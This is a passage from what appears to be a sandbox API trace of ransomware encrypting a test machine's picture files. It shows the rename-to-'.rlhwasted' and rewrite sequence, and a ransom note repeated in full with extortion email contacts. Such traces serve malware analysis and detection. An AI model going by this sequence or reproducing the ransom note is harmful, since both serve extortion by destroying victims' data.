dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.094] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\_X55MK5gOL-HtkzFDw.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\_x55mk5gol-htkzfdw.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.095] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.096] SetEndOfFile (hFile=0x124) returned 1 [0196.097] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.097] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.097] lstrcpyW (in: lpString1=0x6e7a52, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\_X55MK5gOL-HtkzFDw.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\_x55mk5gol-htkzfdw.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\_X55MK5gOL-HtkzFDw.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\_x55mk5gol-htkzfdw.jpg.rlhwasted")) returned 1 [0196.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\_X55MK5gOL-HtkzFDw.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\_x55mk5gol-htkzfdw.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0196.098] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.098] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xfaad [0196.098] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfaad) returned 0x6a0000 [0196.098] CloseHandle (hObject=0x12c) returned 1 [0196.104] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.104] CloseHandle (hObject=0x128) returned 1 [0196.104] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.104] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.105] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.105] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.105] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.106] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.106] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.116] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.117] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.117] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.117] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Qtp1hchFko1guVDwh8Zf/CFCe280gxvaWaAPpOqJMvLOf/bMsh//aokrA8qEOslT\r\nvuj2vUx8MrtU0Ln1PIC5/LijX3fe3FgFn46WHwgVm8F9zGg4MMOxui+DeFsTp6If\r\n2SnUN/2VbSCUzY5v0PFL8e0WC7KnuBQylWpNomPyZuIsIGP3MTuEVSi1AnvxQX3A\r\nxclofGMyLHcnvVVNsZV+OohbbXQhk2KkaJGRSamyzNLqwR3vlB33vtp2UrRfL4kM\r\nCkdyTKbtJ0gHYLZbTAjc73SIC/YA7sVUDHmWpaTfHxsFk7aCYs3wC1TD8mg7X7no\r\nLXsrKFTSwM8gQEniOIrJcrGLD5fu2YLz5AFtxym3HtKcob5hyRcz3+HyEoAVV6yJ\r\n+j0ymC66DMJ7LN1ZCyLO2tefY4pYocA64vGri+vdGDC28WJSeHum7oGPuTo8cF9Z\r\nLxrj8E/ettnVW+YQMvYOw+MP5rsR/mVRyFC2Ku6S3/bIgkIC2T4upjCleIbM5Zfn\r\nVtQ+BA9K2uEUkLLlfWw8mFa6ZQ3vqByZQ4HAJGj4FMygGeDVlybFCzjl6jiT29Tw\r\nmoOk7MjgMDWXe9je1+Yht4KywiKPGjPAUiVnJQwC12raqisRx5Y+HBchkm6fymYf\r\npr0SvgFXmaI7v83ajqHVkSkaPsuWmNhw/ADn0Sqo7VS=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.118] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.118] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.118] SetEndOfFile (hFile=0x124) returned 1 [0196.121] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.121] CloseHandle (hObject=0x124) returned 1 [0196.123] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.123] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e86c8 | out: hHeap=0x6b0000) returned 1 [0196.123] _aulldvrm () returned 0x0 [0196.123] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.125] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.125] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\PfJawLNFFwT mUf.bmp") returned 77 [0196.125] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a4) returned 0x6d4580 [0196.125] lstrcpyW (in: lpString1=0x6d461a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.125] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.125] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.126] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.126] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\PfJawLNFFwT mUf.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\pfjawlnffwt muf.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.127] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.128] SetEndOfFile (hFile=0x124) returned 1 [0196.128] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.128] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.128] lstrcpyW (in: lpString1=0x6d461a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\PfJawLNFFwT mUf.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\pfjawlnffwt muf.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\PfJawLNFFwT mUf.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\pfjawlnffwt muf.bmp.rlhwasted")) returned 1 [0196.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\PfJawLNFFwT mUf.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\pfjawlnffwt muf.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.130] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0196.130] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x7b01 [0196.130] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b01) returned 0x6a0000 [0196.130] CloseHandle (hObject=0x128) returned 1 [0196.229] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.230] CloseHandle (hObject=0x12c) returned 1 [0196.230] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e7988 [0196.230] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.231] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e79d0 | out: pbBuffer=0x6e79d0) returned 1 [0196.231] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.231] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.231] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.231] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.241] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8428 [0196.242] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.242] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.242] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]V0QVCNMpKfhmhKlhYLHQG83UQ/do8ZfdzxW94/JZrId17HqQEeYNDhqWbHiGBUKG\r\nQzZQwutKc5fKNi4/mMMneHFmYcL9uinbudjatjMc8MJ077RhMl9JFpNEKhy+t5/u\r\ncxxtHBYN41OWRU22/Er2chVVzuj4Mx4J6H5BhHrWruHRA8ZhGc/t459B+po4KOMh\r\nHSCpxFD48F/BbKflSMU7mZXVSpA7zgTcGiI5tLC54BRHJJ4zqxiI4PZtAg2ckypM\r\nVBS0Opp/OOKRar/L/ZxczoA+1wfyJm+Uh75cOJeY5vrLxcewIvc1fvnFJ1FlZpQI\r\nMo24VLm4MSaD8bNwN/cGkQW53J6whVkaME4d3LvEWh/qLdg+Tl6mA/cWREOlsjXB\r\nmFfbf9VzutvWxL/xpe+0O97wPCxWUeOWaGtaMd2w/cguBm81CTMlrCL+es1jseza\r\nGXG4olSlN7UQihXCyxx628ve36iuE3xhuTjQ0lwAChjW9Oa71qCmMiw8jXB+/Gtn\r\nTp7fAqnI1V0tDuh8hjmT+MVDZwnja7RRn7bvszUTKzA7kstWnCIFTgwipTQXfFjV\r\nuxJYN3UEUQ1PLYuRs/QFlBXJvqUVAPdPfw2KQKaTL5DCl1gW5Y/QmbhNhvELIL4r\r\n/s1LGqQU1OLlBhgylGVAxy5Xtz7ABBrSEu9gn4rtcSr=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.242] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8428 | out: hHeap=0x6b0000) returned 1 [0196.242] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.243] SetEndOfFile (hFile=0x124) returned 1 [0196.245] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.245] CloseHandle (hObject=0x124) returned 1 [0196.247] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.247] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fe918 | out: hHeap=0x6b0000) returned 1 [0196.247] _aulldvrm () returned 0x0 [0196.247] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.248] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.249] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\03TGpg1kbZwgPyZMP0.jpg") returned 80 [0196.249] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0196.249] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.249] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.249] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.250] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.250] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\03TGpg1kbZwgPyZMP0.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\03tgpg1kbzwgpyzmp0.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.251] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.252] SetEndOfFile (hFile=0x124) returned 1 [0196.252] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.252] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.252] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\03TGpg1kbZwgPyZMP0.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\03tgpg1kbzwgpyzmp0.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\03TGpg1kbZwgPyZMP0.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\03tgpg1kbzwgpyzmp0.jpg.rlhwasted")) returned 1 [0196.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\03TGpg1kbZwgPyZMP0.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\03tgpg1kbzwgpyzmp0.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0196.254] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0196.254] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xd34b [0196.254] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd34b) returned 0x6a0000 [0196.254] CloseHandle (hObject=0x12c) returned 1 [0196.259] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.260] CloseHandle (hObject=0x10c) returned 1 [0196.260] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6d4580 [0196.260] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0196.261] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6d45c8 | out: pbBuffer=0x6d45c8) returned 1 [0196.261] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.261] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0196.262] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.262] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8428 [0196.272] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.272] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]korqdOh9ETlXQEm3w15WoQINanEB/aquy7/AauaqDJdVZFn67MjGm4zZpA6PeVPG\r\nvbsgLqsR49vYH249QuaWQzWTG4SeU7JMHwLwgIGhYmeYOyTwyz6+ZOh83FuxjXOn\r\nxm22q4Y/vCwNDmgK5CwOFmbh+8FojRxI6iQ/Eb/m7E0H8fwT60FCYQ4qrFm2u2hL\r\ng7JLxyXOMSAlt8D34NmxBFHXSZ1faNuHEj0HkwLU3w7/Gdqlt9T64V20XZHvXPbk\r\n//bZ9MheJcMH6LzriWObrlmqIaJ14oHXWLG/J2/sApXskpkVYRTL05KALPO5yteO\r\ndgnsPs+ye6+SXdM09I3o5A37Ap9UcSrAzDtZhe6jxJWyfcaFeA00OlBv2HxyxbG+\r\n9ZTe5Idd3+FivjGTpIJsJPAsPzdvjBX6mEDBYiPG9WuJw5eQen3hNaP1re9aP4h3\r\nna1119aevDki3e16dv7pP51BRshKj/nQmrJd1iPcaQ2FE7+pFPwPAoYu32zOJ1xR\r\n1mS65cTcmGPDZMr02aXjtRIC3tLP8ilv9vKd1iKo2kn92rfEusRQrvuVea/JEAnH\r\nsVxcwuriGUjwEeLYBRSmkHNtNej/AQyBtbh73HSv0t+cS9RhCFhuTMa0IK4xeRCb\r\nLlGSKxcTqlF16Drf2zKi6ikiyitrEosXLP5BE50mH+A=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.272] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8428 | out: hHeap=0x6b0000) returned 1 [0196.272] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.272] SetEndOfFile (hFile=0x124) returned 1 [0196.323] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.323] CloseHandle (hObject=0x124) returned 1 [0196.325] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0196.325] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700c68 | out: hHeap=0x6b0000) returned 1 [0196.326] _aulldvrm () returned 0x0 [0196.326] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.327] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.327] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\AFZ-XHK6Yw.png") returned 72 [0196.327] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29a) returned 0x6e7f18 [0196.327] lstrcpyW (in: lpString1=0x6e7fa8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.327] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.327] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.328] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.328] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\AFZ-XHK6Yw.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\afz-xhk6yw.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.329] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.330] SetEndOfFile (hFile=0x124) returned 1 [0196.330] SetFilePointer (in: hFile=0x124, 